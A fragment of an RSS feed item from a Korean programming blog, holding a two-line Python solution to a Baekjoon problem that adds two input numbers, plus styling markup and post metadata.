&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586083678704&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a,b = input().split()
 
print(int(a) + int(b))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/285&quot;&gt;https://kimbumyun.tistory.com/285&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/10</guid>
      <comments>https://rgb4.tistory.com/10#entry10comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:48:15 +0900</pubDate>
    </item>
  </channel>
</rss>